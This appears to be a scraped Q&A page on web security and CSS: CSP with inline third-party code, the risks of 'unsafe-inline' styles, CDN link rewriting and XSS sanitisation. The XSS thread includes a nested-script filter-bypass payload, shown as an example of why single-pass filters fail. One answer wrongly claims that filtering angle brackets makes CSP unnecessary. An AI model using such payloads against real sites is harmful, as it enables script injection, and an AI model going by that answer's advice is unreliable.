Implementing CSP in an existing system containing third party libraries - css

I've learn some about Content-Security-Policy, although not fully (and that's why I'm here), and now I want to implement CSP in a rather old existing project.
Problem is, many files has multiple javascript/css inlines. Both that I've created myself and some from third party libraries...
What is the best way to take care of these inlines, if any? There are plenty of files and I dont want to go into all the files and adjust them (if it's possible), especially not in the third party files.
From what I've understood, by using 'self' directive, it authorizes linked javascript files in the domain. Now some of the linked third party libraries in the project are containing inline css, or "innerHTML += someMarkUpCode;", which in turns gives
"Refused to apply inline style because it violates the following Content Security Policy directive:" in the browser.
I've also read you can use hash or nonce for inlines, Problem is; some third party files seems to be dynamic (like the example above), so I guess hashing cannot be used?
I've been looking into nonce, but it seems like it's not supported by IE? Not sure how it could be used with third party libraries either.
But I guess for constant pages hash or nonce could be used...
I dont want to use 'unsafe-inline' directive.
Have I missed anything obvious?
TL;DR:
What is the best way to manage third party libraries containing inlines when implementing CSP?

Related

CSP style-src: 'unsafe-inline' - is it worth it?

Currently I'm using Modernizr on all my sites and it turns out because of how it works it requires unsafe-inline styles to be allowed. I am already not allowing inline scripts and unsafe-eval for scripts. Curious as to what security risks there are for allowing inline styles?
Allowing inline styles makes you susceptible to a the "other XSS". Cross Site Styling attacks.
The idea here is that any places where a user can inject a style attribute into your document they can modify the appearance of your page any way they want. I'll list a couple potential attacks ordered by increasing severity:
They could turn your page pink, and make it look silly.
They could modify the text of your page, making it look like you're saying something offensive that could offend your readership audience.
They could make user generated content, like a link they provided appear outside of the normal places where people expect to see user content, making it appear official. (eg, replacing a "Login" button on your site with their own link).
Using a carefully crafted style rules they could send any information included on the page to external domains and expose or otherwise use that data maliciously against your users.
The fourth example, with the information being leaked to external domains could be entirely prevented in spite of the unsafe-inline provided you ensure your other CSP rules never allow any kind of request to go to a untrusted or wildcard domain. But the first 3 will always be possible if you miss blocking a style attribute somewhere.
Mike West did a good talk on this for CSSConf a few years back for some more examples.
Personally I find not using unsafe-inline for CSS is impractical. It means I have to use an external style sheet file for EVERY style. Coloring text, centering text etc. It can be done. You can do this by using a main style sheet "main.css" and a file sheet for every page ("index.css", "contect.css", etc). However I am not so stupid that I allow arbitrary code execution; I filter out all less then and grater then signs. I find this to be an unreasonable restriction. Blocking inline JavaScript is not as bad as blocking inline CSS. I can see blocking inline JavaScript. However I don't think I will do that ether. If you are careful to filter your less then and grater then signs (there are some other stupid things you can do besides not filtering these) if you don't make stupid mistakes that allows arbitrary code execution then you are safe. These inline blocks are only created to protect web developers that screw up there code in a way that allows arbitrary code execution. But the blocks make it a bit harder to code. So it's a trade off.
TLDR IMHO not worth blocking inline CSS, worth blocking inline JavaScript but unnecessary. I will NOT consider blocking inline CSS, I am not going to block inline JavaScript but I might consider it.
Experience: I am a web designer that designs in code using HTML CSS JavaScript and PHP. I have my own website that I coded by hand. And I validate with the official w3 validator. I keep up with web design standards like HTML5.

How can I identify unused CSS classes?

Our development team recently took on the task of refactoring our enormous CSS file so that it will be more manageable in the future. I came up with a small list of subtasks, one of which is:
Remove the styles that aren't in use.
The problem is, I don't know how to identify which styles are being used. Some styles don't appear to be coded anywhere, such as those found in third party controls. A solution-wide search does not find these third party styles (like the default styles that come with Telerik controls). We appear to have overridden some of these third party styles.
Short of deleting stuff and then checking every page to make sure that it looks identical, I do not know what to do. Is there a solid method for determining when a CSS class is in use?
In addition to the other online services, for local or privately stored projects you might find Helium.js useful.

Best practices for identifiers/classes names in browser extensions

In extensions (I'm praticularly focused on Chrome's extensions), css identifiers and classes injected in a page may enter in conflict with other elements on the page.
I'm trying to define their name with an extension prefix, but it's not perfectly sure. So, is there a way to define scurely names of css ids/classes?
It's not possible if "perfectly sure" is your requirement. Someone could always download your extension, look at the classnames you're using, then change their website's CSS to conflict with (or more likely attempt to override) your classnames. This is a feature, not a bug; extensions extend web pages, so they're supposed to be able to commingle with and alter their DOMs.
If you wanted to invent a system where others would not intentionally conflict with yours, why not use the Java namespace scheme: take a domain you own, and use it as a prefix, like com-example-myclassname? Slightly less readable and no more secure would be either the ID of your extension or a randomly generated SHA-1 hexcoded hash:
abcdefghijklmnop-myclassname
da39a3ee5e6b4b0d3255bfef95601890afd80709-myclassname
I'm intentionally not including dynamic solutions here because CSS typically isn't dynamic in a Chrome extension or app. Moreover, CSP would probably make this approach anything but straightforward (which is a good thing).

Rewriting binary links to use CDN

CDN integration seems to be a hot topic among Tridion crowd. But, somehow, available discussions mainly revolve around pushing content to/fro CDN. What i'm specifically interested is:
What will be the proper way of modifying/prefixing inline images outbound links to use CDN?
The simplest way to go would be to create some post-processing TBB, operating on Output item, and place it inside 'Default Finish Actions'. Though, doing this on CD side would seem to be more correct, ain't it so?
EDIT
Consider fancier case: what if not only I want to modify image paths, but wrap the whole image links into ASP.Net controls. Where do I do this?
EDIT 2
So far, implemented tag to ASP.Net control replacement via TBB. Went smooth, only needed to keep an eye on the following subtle matters:
Consider CSS inline styles (i.e.: background-image: url(..))
New TBB needs to be placed after any link-manipulating logic (e.g.: Extract Binaries from Html, Publish Bnaries in Package, Link Resolver)
The quickest and most robust implementation is probably with a simple string replacements (in contrast to regexp's or XML parsing)
To keep standard "Preview" logic intact, some condition is necessary to trigger the logic
If you decide to go with ASP.NET controls for your CDN-hosted images, you may consider these phases/steps:
write a TCDL tag (e.g. <tcdl:image id="..." path="...") on CM during rendering
write a TCDL TagHandler implementation that transforms the TCDL into an ASP.NET include during deployment
write the ASCX control to do the CDN lookup proper when the visitor requests the page
I'm not sure if both step 2 and 3 are needed. You might also simply write the CDN path during the deployment phase (step 2 above).
At the same time I'd expect you to upload (updated) images to the CDN using a deployer extension, so that it also happens during phase 2.

Best practice for preventing saving malicious client script in HTML

We have an ASP.NET custom control that lets users enter HTML (similar to a Rich text box). We noticed that a user can potentially inject malicious client scripts within the <script> tag in the HTML view. I can validate HTML code on save to ensure that I remove any <script> elements.
Is this all I need to do? Are all other tags other than the <script> tag safe? If you were an attacker, what else would you attempt to do?
Any best practices I need to follow?
EDIT - How is the MS anti Xss library different from the native HtmlEncode for my purpose?
XSS (Cross Site Scripting) is a big a difficult subject to tackle correctly.
Instead of black-listing some tags (and missing some of the ways you may be attacked), it is better to decide on a set of tags that are OK for your site and only allowing them.
This in itself will not be enough, as you will have to catch all possible encodings an attacker might try and there are other things an attacker might try. There are anti-xss libraries that help - here is one from Microsoft.
For more information and guidance, see this OWASP article.
Have a look at this page:
http://ha.ckers.org/xss.html
to get an idea of different XSS attacks that somebody may try.
There's a whole lot to do when it comes to filtering out JavaScript from HTML. Here's a short list of some of the bigger points:
Multiple passes over the input is required to make sure that what you removed before doesn't create a new injection. If you're doing a single pass, things like <scr<script></script>ipt>alert("XSS!");</scr<script></script>ipt> will get past you since after your remove <script> tags from the string, you'll have created a new one.
Strip the use of the javascript: protocol in href and src attributes.
Strip embedded event handler attributes like onmouseover/out, onclick, onkeypress, etc.
White lists are safer than black lists. Only allow tags and attributes that you know are safe.
Make sure you're dealing with all the same character encoding. If you treat the input like ASCII (single byte) and the input has Unicode (multibyte) characters, you're going to get a nasty surprise.
Here's a more complete cheat sheet. Also, Oli linked to a good article at ha.ckers.org with samples to test your filtration.
Removing only the <script> tags will not be sufficient as there are lots of methods for encoding / hiding them in input. Most languages now have anti-xss and anti-csrf libraries and functions for filtering input. You should use one of these generally agreed upon libraries to filter your user input.
I'm not sure what the best options are in ASP.NET, but this might shed some light:
http://msdn.microsoft.com/en-us/library/ms998274.aspx
This is called a Cross Site Scripting (XSS) attack. They can be very hard to prevent, as there are a lot of surprising ways of getting JavaScript code to execute (javascript: URLs, sometimes CSS, object and iframe tags, etc).
The best approach is to whitelist tags, attributes, and types of URLs (and keep the whitelist as small as possible to do what you need) instead of blacklisting. That means that you only allow certain tags that you know are safe, rather than banning tags that you believe to be dangerous. This way, there are fewer possible ways for people to get an attack into your system, because tags that you didn't think about won't be allowed, rather than blacklisting where if you missed something, you will still have a vulnerability. Here's an example of a whitelist approach to sanitization.

Resources